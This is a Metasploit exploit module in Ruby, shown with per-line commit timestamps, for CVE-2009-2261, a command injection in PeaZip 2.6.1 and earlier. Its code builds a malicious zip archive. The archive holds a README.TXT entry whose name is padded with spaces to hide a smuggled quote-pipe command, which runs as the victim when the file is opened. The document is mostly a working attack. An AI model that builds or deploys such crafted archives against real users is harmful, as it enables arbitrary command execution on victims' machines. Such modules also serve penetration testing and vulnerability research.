2010-02-10 17:28:25 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2010-02-10 17:28:25 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
require 'rex/zip'
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ExcellentRanking
|
2010-02-10 17:28:25 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::FILEFORMAT
|
2010-02-10 17:28:25 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => 'PeaZip <= 2.6.1 Zip Processing Command Injection',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits a command injection vulnerability in PeaZip. All
|
|
|
|
|
versions prior to 2.6.2 are suspected vulnerable. Testing was conducted with
|
|
|
|
|
version 2.6.1 on Windows.
|
2010-02-10 17:28:25 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
In order for the command to be executed, an attacker must convince someone to
|
|
|
|
|
open a specially crafted zip file with PeaZip, and access the specially file via
|
|
|
|
|
double-clicking it. By doing so, an attacker can execute arbitrary commands
|
|
|
|
|
as the victim user.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
|
|
|
|
'Nine:Situations:Group::pyrokinesis',
|
|
|
|
|
'jduck'
|
|
|
|
|
],
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'CVE', '2009-2261' ],
|
|
|
|
|
[ 'OSVDB', '54966' ],
|
|
|
|
|
[ 'URL', 'http://peazip.sourceforge.net/' ],
|
|
|
|
|
[ 'EDB', '8881' ]
|
|
|
|
|
],
|
2013-09-24 17:33:31 +00:00
|
|
|
'Platform' => %w{ linux unix win },
|
2013-08-30 21:28:54 +00:00
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'Space' => 1024,
|
|
|
|
|
'BadChars' => '',
|
|
|
|
|
'DisableNops' => true,
|
|
|
|
|
'Compat' =>
|
|
|
|
|
{
|
|
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
|
'RequiredCmd' => 'generic perl telnet',
|
|
|
|
|
}
|
|
|
|
|
},
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
|
|
|
|
['Automatic', { }],
|
|
|
|
|
],
|
|
|
|
|
'DisclosureDate' => 'Jun 05 2009',
|
|
|
|
|
'DefaultTarget' => 0))
|
2010-02-10 17:28:25 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
OptString.new('FILENAME', [ true, 'The file name.', 'msf.zip']),
|
|
|
|
|
], self.class)
|
|
|
|
|
end
|
2010-02-10 17:28:25 +00:00
|
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def exploit
|
2010-02-10 17:28:25 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# NOTE: using a command line containing / or \ will result in the command
|
|
|
|
|
# being easily visible to the victim
|
|
|
|
|
cmd = datastore['CMD']
|
2010-02-10 17:28:25 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
fname = "README.TXT"
|
|
|
|
|
rest = "\"|#{cmd}|.txt"
|
|
|
|
|
fname << " " * (255 - fname.length - rest.length)
|
|
|
|
|
fname << rest
|
2010-02-10 17:28:25 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
content = rand_text_alphanumeric(rand(1024))
|
2010-02-10 17:28:25 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
zip = Rex::Zip::Archive.new
|
|
|
|
|
zip.add_file(fname, content)
|
2010-02-10 17:28:25 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Create the file
|
|
|
|
|
print_status("Creating '#{datastore['FILENAME']}' file...")
|
2010-02-10 17:28:25 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
file_create(zip.pack)
|
|
|
|
|
end
|
2010-02-10 17:28:25 +00:00
|
|
|
|
|
|
|
|
end
|
